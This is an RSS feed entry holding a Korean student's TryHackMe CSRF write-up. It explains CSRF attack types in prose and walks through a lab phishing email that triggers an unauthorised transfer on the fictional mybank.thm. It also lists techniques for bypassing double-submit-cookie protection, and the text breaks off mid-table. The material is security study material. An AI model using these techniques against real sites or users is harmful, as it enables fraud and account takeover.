<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>AnbyMata의 해킹 노트</title>
    <link>https://anbymata.tistory.com/</link>
    <description>정보보안 공부 중인 대학생이 알려주는 해킹 노트</description>
    <language>ko</language>
    <pubDate>Fri, 22 May 2026 10:47:53 +0900</pubDate>
    <generator>TISTORY</generator>
    <ttl>100</ttl>
    <managingEditor>AnbyMata</managingEditor>
    <image>
      <title>AnbyMata의 해킹 노트</title>
      <url>https://tistory1.daumcdn.net/tistory/7718909/attach/7b16891a901242ceb236fac254c655cc</url>
      <link>https://anbymata.tistory.com</link>
    </image>
    <item>
      <title>[TryHackMe] CSRF</title>
      <link>https://anbymata.tistory.com/73</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;TryHackMe -&lt;/b&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&quot;&lt;b&gt;CSRF&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;&quot;. &lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;Write-up + Extra Study!&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1036&quot; data-origin-height=&quot;257&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cIBIf8/dJMcaciFMrW/8VS1lOCOFEg15NqKrdX9B0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cIBIf8/dJMcaciFMrW/8VS1lOCOFEg15NqKrdX9B0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cIBIf8/dJMcaciFMrW/8VS1lOCOFEg15NqKrdX9B0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcIBIf8%2FdJMcaciFMrW%2F8VS1lOCOFEg15NqKrdX9B0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1036&quot; height=&quot;257&quot; data-origin-width=&quot;1036&quot; data-origin-height=&quot;257&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;출처: &lt;a href=&quot;https://tryhackme.com/room/csrfV2&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://tryhackme.com/room/csrfV2&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1777714549113&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;CSRF&quot; data-og-description=&quot;Learn how a CSRF vulnerability works and methods to exploit and defend against CSRF vulnerabilities.&quot; data-og-host=&quot;tryhackme.com&quot; data-og-source-url=&quot;https://tryhackme.com/room/csrfV2&quot; data-og-url=&quot;https://tryhackme.com/room/csrfV2&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/ZhBXx/dJMb8T923MS/bZkglHX5D3bpEzkogOOZkK/img.png?width=1200&amp;amp;height=1200&amp;amp;face=0_0_1200_1200,https://scrap.kakaocdn.net/dn/JGOAg/dJMb9g5eDQC/lSnLlm6elNrkSxttwyL0w0/img.png?width=1200&amp;amp;height=1200&amp;amp;face=0_0_1200_1200,https://scrap.kakaocdn.net/dn/SJ3xv/dJMb9b3Vy6X/r8VWGQ2N7IQKsay6O3RbRK/img.png?width=1920&amp;amp;height=300&amp;amp;face=0_0_1920_300&quot;&gt;&lt;a href=&quot;https://tryhackme.com/room/csrfV2&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://tryhackme.com/room/csrfV2&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/ZhBXx/dJMb8T923MS/bZkglHX5D3bpEzkogOOZkK/img.png?width=1200&amp;amp;height=1200&amp;amp;face=0_0_1200_1200,https://scrap.kakaocdn.net/dn/JGOAg/dJMb9g5eDQC/lSnLlm6elNrkSxttwyL0w0/img.png?width=1200&amp;amp;height=1200&amp;amp;face=0_0_1200_1200,https://scrap.kakaocdn.net/dn/SJ3xv/dJMb9b3Vy6X/r8VWGQ2N7IQKsay6O3RbRK/img.png?width=1920&amp;amp;height=300&amp;amp;face=0_0_1920_300');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;CSRF&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Learn how a CSRF vulnerability works and methods to exploit and defend against CSRF vulnerabilities.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;tryhackme.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[1]&amp;nbsp; Overview of CSRF Attack&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;CSRF (Cross-site Request Forgery)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 사용자가 로그인 상태를 악용해, 사용자 대신 요청을 보내는 공격&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 브라우저가 인증 정보 관련 쿠키를 자동으로 포함한다는 점을 악용&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[1-1] CSRF 공격 흐름&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1. 웹 애플리케이션의 요청 형식 파악&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2. 사용자에게 악성 링크 전송 &amp;rarr; 클릭 유도&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3. 브라우저가 자동 포함한 쿠키를 포함해 공격자가 요청 전송&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;4. 서버가 정상 사용자의 요청으로 인색 &amp;rarr; 요청 수행&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[1-2] CSRF의 영향&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;Unauthorized Access&lt;/b&gt; - 사용자 권한을 통한 계정 변경 등의 비인가 행동&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;-&lt;b&gt; Exploiting Access&lt;/b&gt; - 사용자 신뢰를 악용한 보안 신뢰성 약화&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;Stealthy Exploitation&lt;/b&gt; - 브라우저의 정상 동작을 이용하여 공격 탐지 어려움&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[2]&amp;nbsp; Types of CSRF Attack&lt;/b&gt;&lt;/h3&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[2-1] Traditional CSRF&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- form 제출을 통해 상태를 변경하는 동작 &lt;b&gt;state-changing actions&lt;/b&gt;에 집중&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1. 로그인한 사용자에게 &lt;b&gt;악성 링크&lt;/b&gt; 및 &lt;b&gt;메일&lt;/b&gt;,&lt;b&gt; form&lt;/b&gt; 전달&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2. 사용자가 클릭&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3. 브라우저가 자동으로 쿠키를 포함한 요청 전송&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;4. 서버가 정상 요청으로 인식 &amp;rarr; 금액 송금, 계정 정보 수정, 이메일 변경 등을 수행&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[2-2] XMLHttpRequest CSRF&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 전체 페이지 &lt;b&gt;request-response&lt;/b&gt; 사이클 없이 동작이 수행될 때 발생&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;XMLHttpRequest&lt;/b&gt; 또는 &lt;b&gt;Fetch API&lt;/b&gt;를 이용한 asynchronous&lt;span style=&quot;color: #9d9d9d;&quot;&gt;(비동기)&lt;/span&gt; 서버 통신을 사용하는 최신 웹 애플리케이션에서 흔히 발생&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1. 로그인한 사용자에게 &lt;b&gt;악성 페이지&lt;/b&gt; 접속 유도&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2. 악성 페이지 접속 시, JavaScript가 &lt;b&gt;AJAX&lt;/b&gt; 요청 생성&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3. 브라우저가 자동으로 쿠키를 포함한 요청 전송&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;4. 서버가 정상 요청으로 인식 &amp;rarr; 이메일 전달 설정 변경 &amp;rarr; 공격자 주소로 메일 전달&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[2-3] Flash-based CSRF&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;Adobe Flash Player&lt;/b&gt;의 취약점을 악용한 공격&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 현재는 거의 사라짐 (Adobe Flash Player의 서비스 종료)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1. 사용자가 악성 사이트의&lt;b&gt; Flash 콘텐츠&lt;/b&gt; 실행&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2. 악성&lt;b&gt; .swf&lt;/b&gt; 파일을 자신의 웹사이트에 업로드&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3. Flash가 쿠키를 포함한 요청을 피해 사이트로 전송&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;4. 서버가 정상 요청으로 인식 &amp;rarr; CSRF 공격 성공&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[3]&amp;nbsp; Basic CSRF - Hidden Link / Image Exploitation&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Hidden link / Image Exploitation&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 인지하기 힘든 0x0 픽셀 이미지나 링크를 웹페이지에 삽입하는 공격&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 이미지의 &lt;b&gt;src&lt;/b&gt; 또는 링크의 &lt;b&gt;href&lt;/b&gt; 속성에 공격 URL을 삽입&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[3-1] Hidden Link / Image Exploitation 실습&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1)&amp;nbsp; 피해자 로그인 상태&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 피해자는 메일 (&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;mailbox.thm&lt;/b&gt;&lt;/span&gt;)을 확인하고, 은행 계정 (&lt;b&gt;&lt;span style=&quot;color: #5733b1;&quot;&gt;mybank.thm&lt;/span&gt;&lt;/b&gt;)에 로그인함&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 피해자는 항상 은행 (&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;mybank.thm&lt;/b&gt;&lt;/span&gt;)에 &lt;b&gt;로그인한 상태 유지&lt;/b&gt;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 100%;&quot;&gt;&lt;span style=&quot;color: #953b34;&quot;&gt;[보충 설명]&lt;/span&gt;&lt;br /&gt;&quot;&lt;b&gt;GB82MYBANK5698&lt;/b&gt;&quot; username으로 로그인한 계정은 피해자 Josh의 계정이 아닌 공격자의 계정입니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;2)&amp;nbsp; mybank.thm 취약점&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 공격자 자신의 은행 (&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;mybank.thm&lt;/b&gt;&lt;/span&gt;) 계정을 통해 취약점 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; 송금 시 요청 검증을 위한 추가적인 파라미터가 없음을 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;rarr; &lt;b&gt;URL&lt;/b&gt;만으로 송금 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;3)&amp;nbsp; 악성 링크를 포함한 이메일 전송&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 피해자의 클릭을 유도하는 이메일 전송 (경품 당첨!)&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;927&quot; data-origin-height=&quot;526&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Npr8E/dJMcahj2x7w/ik7h2VOxU7W7cACQn42H80/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Npr8E/dJMcahj2x7w/ik7h2VOxU7W7cACQn42H80/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Npr8E/dJMcahj2x7w/ik7h2VOxU7W7cACQn42H80/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FNpr8E%2FdJMcahj2x7w%2Fik7h2VOxU7W7cACQn42H80%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;927&quot; height=&quot;526&quot; data-origin-width=&quot;927&quot; data-origin-height=&quot;526&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &quot;Click Here to Redeem&quot; 버튼을 누르면, &lt;b&gt;은행 송금 페이지 링크&lt;/b&gt;로 연결됨&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;4)&amp;nbsp; 공격 성공 여부&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;b&gt;(4-1)&lt;/b&gt; 피해자가 은행 (&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;mybank.thm&lt;/b&gt;&lt;/span&gt;)에 로그인을 &lt;b&gt;안&lt;/b&gt; 한 상태&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;464&quot; data-origin-height=&quot;364&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/N4ebz/dJMcaarE1Rd/pgGKjdvLAdDhAHyKKwZdg0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/N4ebz/dJMcaarE1Rd/pgGKjdvLAdDhAHyKKwZdg0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/N4ebz/dJMcaarE1Rd/pgGKjdvLAdDhAHyKKwZdg0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FN4ebz%2FdJMcaarE1Rd%2FpgGKjdvLAdDhAHyKKwZdg0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;464&quot; height=&quot;364&quot; data-origin-width=&quot;464&quot; data-origin-height=&quot;364&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;= 은행 송금 페이지로 이동을 하더라도, 로그인이 안되어 있어 로그인 창으로 이동&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;nbsp;(4-2)&lt;/b&gt; 피해자가 은행 (&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;mybank.thm&lt;/b&gt;&lt;/span&gt;)에 로그인을 한 상태&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;= 쿠키에 있던 로그인 정보를 통해 공격자에게 &lt;b&gt;자동 송금&lt;/b&gt; 완료&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;nbsp;(4-3)&lt;/b&gt; 은행 (&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;mybank.thm&lt;/b&gt;&lt;/span&gt;) 사이트에 검증을 위한 별도의 &lt;b&gt;CSRF 토큰&lt;/b&gt;이 존재&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;= 서버가 CSRF 토큰이 포함되지 않음을 확인 &amp;rarr; 송금 이루어지지 않음&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[4]&amp;nbsp; Double Submit Cookie Bypass&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;CSRF token&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 요청 출처를 검증하기 위한 &lt;b&gt;hidden parameter&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 고유한 예측 불가능한 값&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Double Submit Cookie&lt;/b&gt; 기법&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;쿠키&lt;/b&gt; 값과 &lt;b&gt;hidden form 필드&lt;/b&gt; 값이 일치하는지 확인하는 검증 장치&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[4-1] Double Submit Cookies 작동 흐름&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1. Token Generation&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 사용자가 로그인 or 세션 시작 시, 서버가 고유한 CSRF 토큰 생성&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- cookie와 web form의 hidden field 두 가지 형태로 사용자 브라우저에 전달&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;2. User Action&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 사용자가 hidden CSRF 토큰이 포함된 form 작성&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;3. Form Submission&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 쿠키에 포함된 토큰과 form 데이터에 포한된 토큰을 서버로 전송&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;4. Server Validation&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 서버가 cookie의 CSRF 토큰과 form 데이터의 토큰이 일치하는지 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[4-2] Double Submit Cookie 우회 방법&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Session Cookie Hijacking (MITM 공격)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- CSRF 토큰의 보호가 약함 &amp;rarr; 악성코드, 네트워크 sniffing 등으로 토큰 탈취&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Same-Origin Policy 우회&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 부모 도메인에 쿠키 설정이 가능한 공격자의 subdomain으로 요청 보내도록 유도&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;XSS 취약점 악용&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- XSS 취약점을 활용해 cookie 또는 CSRF 토큰 탈취&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;CSRF 토큰 예측&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 토큰의 생성 과정에 개입 및 생성 패턴 단순 &amp;rarr; 토큰을 추측하거나 변조&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Subdomain Cookie Injection&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 공격자의 subdomain을 통해 사용자 브라우저에 위조된 cookie 주입 &amp;rarr; 서버가 정상 cookie로 인식&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[4-3] Reversing Token generation + Subdomain Cookie Injection&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1)&amp;nbsp; CSRF 토큰 분석&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 공격자 계정으로 은행 (&lt;b&gt;&lt;span style=&quot;color: #5733b1;&quot;&gt;mybank.thm)&lt;/span&gt;&lt;/b&gt; 사이트의 토큰 분석&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 비밀번호 변경 form에 CSRF Token 존재함&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;857&quot; data-origin-height=&quot;385&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/M5Tlf/dJMcacXhHgt/LsIUEllWkpiGGkME6WCwR1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/M5Tlf/dJMcacXhHgt/LsIUEllWkpiGGkME6WCwR1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/M5Tlf/dJMcacXhHgt/LsIUEllWkpiGGkME6WCwR1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FM5Tlf%2FdJMcacXhHgt%2FLsIUEllWkpiGGkME6WCwR1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;857&quot; height=&quot;385&quot; data-origin-width=&quot;857&quot; data-origin-height=&quot;385&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;= 브라우저 cookie에 `&lt;b&gt;csrf-token&lt;/b&gt;`과 `&lt;b&gt;PHPSESSID&lt;/b&gt;` 존재함&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
